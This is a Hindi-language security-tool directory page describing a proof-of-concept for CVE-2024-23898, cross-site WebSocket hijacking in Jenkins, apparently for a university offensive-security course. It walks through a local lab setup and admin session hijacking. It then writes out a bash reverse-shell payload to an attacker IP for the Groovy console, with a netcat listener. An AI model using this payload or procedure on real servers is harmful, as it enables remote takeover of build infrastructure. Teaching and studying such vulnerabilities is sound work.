Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE2_Jenkins_RCE — CVE-2024-23898 के लिए एक प्रूफ ऑफ कॉन्सेप्ट क्रॉस-साइट वेबसॉकेट हाईजैकिंग एक्सप्लॉइट — Jenkins संस्करण 2.217-2.441 को प्रभावित करने वाली एक भेद्यता। कार्नेगी मेलन विश्वविद्यालय में हैकिंग और ऑफेंसिव सिक्योरिटी पाठ्यक्रम में शैक्षिक उपयोग के लिए। | Kitploit
उपकरण/GitHubGitHub/davidmgaviria/cve2_jenkins_rce
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारेड टीमिंग
GitHubdavidmgaviria/cve2_jenkins_rce

CVE2_Jenkins_RCE

CVE-2024-23898 के लिए एक प्रूफ ऑफ कॉन्सेप्ट क्रॉस-साइट वेबसॉकेट हाईजैकिंग एक्सप्लॉइट — Jenkins संस्करण 2.217-2.441 को प्रभावित करने वाली एक भेद्यता। कार्नेगी मेलन विश्वविद्यालय में हैकिंग और ऑफेंसिव सिक्योरिटी पाठ्यक्रम में शैक्षिक उपयोग के लिए।

रिपॉजिटरी देखें
221 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Jenkins CLI वेबसॉकेट हाइजैकिंग - PoC

CVE-2024-23898 के लिए एक proof of concept क्रॉस-साइट WebSocket हाइजैकिंग शोषण — यह एक भेद्यता है जो Jenkins संस्करण 2.217-2.441 को प्रभावित करती है।

यह शोषण Jenkins CLI को लक्षित करता है, जिसका उपयोग Jenkins नियंत्रण सर्वर पर दूरस्थ रूप से पहुँचने और कमांड जारी करने के लिए किया जा सकता है। इस शोषण के माध्यम से, एक दूरस्थ हमलावर Jenkins नियंत्रण सर्वर तक पहुँच प्राप्त कर सकता है और एक स्थायी बैक-डोर स्थापित कर सकता है, यदि कोई प्रशासक लक्षित Jenkins नियंत्रण सर्वर में लॉग-इन होने के दौरान किसी दुर्भावनापूर्ण साइट पर जाने के लिए धोखा खा जाता है।


अस्वीकरण

यह कोड केवल शैक्षिक उद्देश्यों के लिए है और केवल कार्नेगी मेलन विश्वविद्यालय में Hacking & Offensive Security पाठ्यक्रम के उपयोग हेतु है। इस कोड का उपयोग हथियार बनाने या मैलवेयर तैयार करने के लिए नहीं किया जाना चाहिए। लेखक ऐसे किसी भी प्रयास की स्पष्ट रूप से निंदा करते हैं।


Jenkins सेटअप करना

  • "docker-compose build && docker-compose up -d" चलाएँ
  • http://localhost:8080 पर जाएँ, आपसे एक एडमिन पासवर्ड पूछा जाएगा
  • jenkins डॉकर कंटेनर में शेल खोलें (POSTGRES वाले में नहीं)
    • "docker exec -it <container_id> bash"
    • Jenkins पेज पर सूचीबद्ध निर्देशिका में cd करें और पासवर्ड प्राप्त करें
  • एक बुनियादी एडमिन खाता सेट करें (पासवर्ड याद रखें) और डिफ़ॉल्ट प्लगइन्स इंस्टॉल करें
  • अज्ञात उपयोगकर्ताओं को बुनियादी अनुमतियों के साथ कॉन्फ़िगर करें: Manage Jenkins > Security पर जाकर
    • प्राधिकरण प्रकार को "Matrix-based" पर सेट करें
    • अज्ञात उपयोगकर्ताओं को "Overall" और "Job" पढ़ने की अनुमति दें

वेबसॉकेट हाइजैकिंग करना

  • Firefox खोलें, Settings > Security & Privacy पर जाएँ
    • Browser Privacy को custom पर सेट करें, Cookies को "off" टॉगल करें (इससे Firefox सभी कुकीज़ को स्वीकार करने देगा)
  • Jenkins पर जाएँ, एडमिन के रूप में लॉगिन करें, "Keep me signed in" पर क्लिक करना सुनिश्चित करें
  • evilApp.py लॉन्च करें, http://localhost:5000 पर जाएँ
    • Network पर जाएँ और रीफ्रेश करें
    • "ws" फ़ाइल वाले पैकेट पर क्लिक करें और Response पर जाएँ, आपको देखना चाहिए कि वहाँ "Authenticated as: admin"" लिखा है
      • आप "remember-me" कुकी देखने के लिए "Cookies" भी जाँच सकते हैं

रिवर्स शेल निष्पादित करना

  • अपनी मशीन के टर्मिनल में, nc -l <port_num> के साथ एक netcat लिसनर शुरू करें (<port_num> को किसी भी अप्रयुक्त पोर्ट नंबर से बदलें)
  • आपको अपने कंप्यूटर का IP पता प्राप्त करना होगा जैसा Docker इसे देखता है। Mac पर आप इसे ipconfig getifaddr en0 कमांड से पा सकते हैं
  • मान लें कि आपका Jenkins सर्वर चल रहा है, [http://localhost:8080/script](http://localhost:8080/script) पर जाएँ। यदि आपने पहले से नहीं किया है तो एडमिन खाते से लॉगिन करें।
  • इस पेलोड को Groovy स्क्रिप्ट कंसोल में पेस्ट करें और निष्पादित करें: ['bash', '-c', 'bash -i >& /dev/tcp/<attacker_ip>/<port_num> 0>&1'].execute()
  • netcat लिसनर वाले टर्मिनल पर वापस जाएँ। अब आप Jenkins सर्वर की फ़ाइल सिस्टम में होंगे और एडमिन उपयोगकर्ता जो कुछ भी कर सकता है, वह सब करने में सक्षम होंगे।
टूल डाउनलोड करें